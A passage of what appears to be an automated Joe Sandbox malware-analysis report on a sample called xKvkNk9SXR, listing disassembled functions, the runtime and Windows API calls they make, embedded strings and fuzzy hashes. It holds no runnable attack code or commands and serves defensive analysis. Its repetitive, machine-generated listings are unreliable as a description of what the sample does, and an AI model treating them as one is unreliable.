                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00A4896E,?,?,?,?,00000000,?,00000000), ref: 00A54B26
                                          • GetLastError.KERNEL32(?,?,?,?,00A4896E,?,?,?,?,00000000,?,00000000), ref: 00A54B51
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A54B67
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A54B75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThreadThreadpoolWait___crt$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateDuplicateException@8HandleReferenceRegisterThrowTimer
                                          • String ID:
                                          • API String ID: 1073306966-0
                                          • Opcode ID: 82fcef33f532bc64b93fac4e82e30130a97d2d2735e6b1eec5e2b177d18f45f2
                                          • Instruction ID: 1d039b6e8a0f0b92da8c810b3031da7e9348fe886d950ef838477031a8f126b2
                                          • Opcode Fuzzy Hash: 82fcef33f532bc64b93fac4e82e30130a97d2d2735e6b1eec5e2b177d18f45f2
                                          • Instruction Fuzzy Hash: F9110236A44300ABDF10ABB49D4AF9A7BB8BF59305F040076FE45DA162EA70C9088771
                                          Function 00A74286 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00A7429A
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          • _free.LIBCMT ref: 00A742A6
                                          • _free.LIBCMT ref: 00A742B1
                                          • _free.LIBCMT ref: 00A742BC
                                          • _free.LIBCMT ref: 00A742C7
                                          • _free.LIBCMT ref: 00A742D2
                                          • _free.LIBCMT ref: 00A742DD
                                          • _free.LIBCMT ref: 00A742E8
                                          • _free.LIBCMT ref: 00A742F3
                                          • _free.LIBCMT ref: 00A74301
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: f7801ce608abba74542970841872fbf783f960c392e8ec804bb14be55bbae25b
                                          • Instruction ID: 773eb51a76abdea8016d751b45bece02f5b5608bdc6b4da74158f130aaa31b0a
                                          • Opcode Fuzzy Hash: f7801ce608abba74542970841872fbf783f960c392e8ec804bb14be55bbae25b
                                          • Instruction Fuzzy Hash: A2116276510108AFDF21EF94CE52CD93BB5EF49790F51C1A6BA488B222EB31DB509B81
                                          Function 00A3A891 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A3A898
                                            • Part of subcall function 009E8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 009E8E09
                                            • Part of subcall function 009E8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 009E8E2B
                                            • Part of subcall function 009E8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 009E8E4B
                                            • Part of subcall function 009E8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 009E8F18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                          • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                          • API String ID: 1383202999-2891247106
                                          • Opcode ID: 8dad2f52efd603d93cd52e0caa5f2804f4c8d942a4c4d84d01fbc6fe4a77387d
                                          • Instruction ID: 372579263995b6eb0d3c09a45305ff71798392442df8a37a53ffc9c98f12650c
                                          • Opcode Fuzzy Hash: 8dad2f52efd603d93cd52e0caa5f2804f4c8d942a4c4d84d01fbc6fe4a77387d
                                          • Instruction Fuzzy Hash: CFA1897190021AAFCF05CF94CD92EFE7BBAEF19314F10441AFA86A6291D631DD50DB62
                                          Function 00A35226 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A3522D
                                            • Part of subcall function 00A2B22F: __EH_prolog3.LIBCMT ref: 00A2B236
                                            • Part of subcall function 00A2B22F: std::_Lockit::_Lockit.LIBCPMT ref: 00A2B240
                                            • Part of subcall function 00A2B22F: std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B2B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                          • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                          • API String ID: 1538362411-2891247106
                                          • Opcode ID: b32637e56e0e59e8562ad87f82807a66048e41ce46557aecb7b67580419029e4
                                          • Instruction ID: 71eed5d8e3bde569e736d6adbb80f8299b300fdc61062cfad688a62d0be750d6
                                          • Opcode Fuzzy Hash: b32637e56e0e59e8562ad87f82807a66048e41ce46557aecb7b67580419029e4
                                          • Instruction Fuzzy Hash: DCA1277190060AAFDF05DFA8CD52EEFBBBAFF49304F10441AF916A6292D635D910DB60
                                          Function 00A74FAD Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleCP.KERNEL32(?,00A6AB2E,E0830C40,?,?,?,?,?,?,00A75722,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76), ref: 00A74FEF
                                          • __fassign.LIBCMT ref: 00A7506A
                                          • __fassign.LIBCMT ref: 00A75085
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00A6AB2E,00000001,?,00000005,00000000,00000000), ref: 00A750AB
                                          • WriteFile.KERNEL32(?,?,00000000,00A75722,00000000,?,?,?,?,?,?,?,?,?,00A75722,00A28F76), ref: 00A750CA
                                          • WriteFile.KERNEL32(?,00A28F76,00000001,00A75722,00000000,?,?,?,?,?,?,?,?,?,00A75722,00A28F76), ref: 00A75103
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID: w#G!
                                          • API String ID: 1324828854-519468572
                                          • Opcode ID: c21b4cdf2f35a58b17d401831b270392d738f4ee641e03f200bdef9858e84870
                                          • Instruction ID: b00d547eb7fb9c3998122d6dee7a2ec5fc76e6fbe44416e89ec4385c147656f5
                                          • Opcode Fuzzy Hash: c21b4cdf2f35a58b17d401831b270392d738f4ee641e03f200bdef9858e84870
                                          • Instruction Fuzzy Hash: D7517171E006499FDF50CFA8DC85BEEBBF8EF09301F14825AE959E7251E6709941CB60
                                          Function 009EC470 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
                                          • String ID: w#G!
                                          • API String ID: 2755674607-519468572
                                          • Opcode ID: 9c48a4c34bd9dbdcbd1f47d2cf738f1e1c3b03745ba0bbfa8c4f134efff6e188
                                          • Instruction ID: c1dc87d61c4207bbba82adc6ae3b374c0232e4f01d8147386e6dcb91e927263e
                                          • Opcode Fuzzy Hash: 9c48a4c34bd9dbdcbd1f47d2cf738f1e1c3b03745ba0bbfa8c4f134efff6e188
                                          • Instruction Fuzzy Hash: E451B1B1D04654CFCB11DF68DA41BAAB7B4FF18710F14426AE846A7351EB34BD42CB91
                                          Function 009F4760 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 124COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F47FD
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F482B
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009F4882
                                          Strings
                                          • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 009F47D4
                                          • w#G!, xrefs: 009F4774, 009F4854
                                          • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 009F4802
                                          • w#G!, xrefs: 009F486A
                                          • w#G!, xrefs: 009F47C4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$___std_exception_copy
                                          • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.$w#G!$w#G!$w#G!
                                          • API String ID: 4178755008-2886307431
                                          • Opcode ID: 1addbf99b3e4b503903271f804265e85eb0ec07ef39351e937afc5e0df9d6722
                                          • Instruction ID: 5dbe723ca870dd93702c7ebcf2aece55feee0912a2bdb895a09aad8436bb0042
                                          • Opcode Fuzzy Hash: 1addbf99b3e4b503903271f804265e85eb0ec07ef39351e937afc5e0df9d6722
                                          • Instruction Fuzzy Hash: B4415171914208AFCB15EFA5C941BEEB7FCFF45720F14466AE911A3641EB74AA04CB60
                                          Function 00A5C635 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 00A5C655
                                            • Part of subcall function 00A5C53F: Replicator::operator[].LIBVCRUNTIME ref: 00A5C5AB
                                            • Part of subcall function 00A5C53F: DName::operator+=.LIBVCRUNTIME ref: 00A5C5B3
                                          • DName::operator+.LIBCMT ref: 00A5C6AC
                                          • DName::DName.LIBVCRUNTIME ref: 00A5C6F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                          • API String ID: 834187326-2211150622
                                          • Opcode ID: 44fdcb3a3416f088baf20ecce1dfa2e9879f84d47b7ab3921b8fbcb0fe5bef64
                                          • Instruction ID: 93771983b70d48da1fffe629a4c52a58be21ea133be681e87a897f44373a2337
                                          • Opcode Fuzzy Hash: 44fdcb3a3416f088baf20ecce1dfa2e9879f84d47b7ab3921b8fbcb0fe5bef64
                                          • Instruction Fuzzy Hash: 5621C374212704DFCF14DF5CD850A663BE0FB05766F046156E846DB666CF38DA46CB50
                                          Function 00A5C8B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • UnDecorator::UScore.LIBVCRUNTIME ref: 00A5C8B8
                                          • DName::DName.LIBVCRUNTIME ref: 00A5C8C2
                                            • Part of subcall function 00A5B218: DName::doPchar.LIBVCRUNTIME ref: 00A5B23F
                                          • UnDecorator::getScopedName.LIBVCRUNTIME ref: 00A5C901
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5C90B
                                          • DName::operator+=.LIBCMT ref: 00A5C91A
                                          • DName::operator+=.LIBCMT ref: 00A5C926
                                          • DName::operator+=.LIBCMT ref: 00A5C933
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                          • String ID: void
                                          • API String ID: 1480779885-3531332078
                                          • Opcode ID: e8910f707ea16cb97945809946f2be83f662793a95751d6ed1a541d922b005c3
                                          • Instruction ID: 76b0d2a52a64e5016b6911352005ff8398494b376d62461a967aec2f2821ec69
                                          • Opcode Fuzzy Hash: e8910f707ea16cb97945809946f2be83f662793a95751d6ed1a541d922b005c3
                                          • Instruction Fuzzy Hash: 1211A174510304EECB08EF64C956BAD7BB4FB01713F444599E8435B2E6DB709A4ACB60
                                          Function 00A7C627 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 1282221369-0
                                          • Opcode ID: 9f15cc1be29f2a09a4706d590689ca3ff9fef3a2e7b954ff4567612d315aaa7c
                                          • Instruction ID: 53c85f38a9153866b75b887c61cd6ee637488459862522a82e7fdc64662c1a34
                                          • Opcode Fuzzy Hash: 9f15cc1be29f2a09a4706d590689ca3ff9fef3a2e7b954ff4567612d315aaa7c
                                          • Instruction Fuzzy Hash: 8A613572901700AFDB34EFB49D81A6E7BA4EF09730F14C16EE94D97286EB358900CB91
                                          Function 00A4A58C Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A4A5AE
                                            • Part of subcall function 00A48978: __EH_prolog3_catch.LIBCMT ref: 00A4897F
                                            • Part of subcall function 00A48978: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00A489B8
                                          • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00A4A5BC
                                            • Part of subcall function 00A495D5: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00A495FA
                                            • Part of subcall function 00A495D5: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00A4961D
                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00A4A5D5
                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A4A5E1
                                            • Part of subcall function 00A48978: InterlockedPopEntrySList.KERNEL32(?), ref: 00A48A01
                                            • Part of subcall function 00A48978: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00A48A30
                                            • Part of subcall function 00A48978: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00A48A3E
                                          • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00A4A62D
                                          • Concurrency::location::_Assign.LIBCMT ref: 00A4A64E
                                          • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00A4A656
                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00A4A668
                                          • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00A4A698
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                                          • String ID:
                                          • API String ID: 2678502038-0
                                          • Opcode ID: 19b773f214a92d81b0263ae4e59a1b4458d1b18e08398e6443640f62689cc304
                                          • Instruction ID: 82da72ef94779eac1aa8caffcfb7145dbcdefe27109da40f0626c11785381607
                                          • Opcode Fuzzy Hash: 19b773f214a92d81b0263ae4e59a1b4458d1b18e08398e6443640f62689cc304
                                          • Instruction Fuzzy Hash: 61310638B80251AECF16AB7846827FEBBBA5FE5304F084469E456D7242DB384D498793
                                          Function 009F6600 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 310COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F67A3
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F67E3
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F6981
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long$PK_DefaultEncryptionFilter: plaintext too long$w#G!
                                          • API String ID: 2005118841-3130109286
                                          • Opcode ID: 00f0493a7b0ec4a54971eb2e8e304f9de636eef21c9babe21f23d5d3610e0ffa
                                          • Instruction ID: d74f6fac8da8b4ee1a4bf40bccc3a0f5e85032c8cb6198125bb0d5260a20f0f6
                                          • Opcode Fuzzy Hash: 00f0493a7b0ec4a54971eb2e8e304f9de636eef21c9babe21f23d5d3610e0ffa
                                          • Instruction Fuzzy Hash: 67B1AA71A00709AFCB24DFA5C994FAEBBF9FF48714F104A2CE54697290EB71A904CB50
                                          Function 009E8DC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009E8E09
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009E8E2B
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009E8E4B
                                          • __Getctype.LIBCPMT ref: 009E8EE1
                                          • std::_Facet_Register.LIBCPMT ref: 009E8F00
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009E8F18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                          • String ID: w#G!
                                          • API String ID: 1102183713-519468572
                                          • Opcode ID: 9bc710596b2460a0bfc922e11a3b0e0d7646e82ba8c0d490ccb80be18f4e9a2c
                                          • Instruction ID: 759e2beb85563d600a37276410611fc3fe9081cd684f58fc66bfc804acc1767f
                                          • Opcode Fuzzy Hash: 9bc710596b2460a0bfc922e11a3b0e0d7646e82ba8c0d490ccb80be18f4e9a2c
                                          • Instruction Fuzzy Hash: F541C071D006548FDB11EF99D981BAEB7B4EB14710F14416EE80AAB391EB34AD42CBD1
                                          Function 00A590D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00A59107
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00A5910F
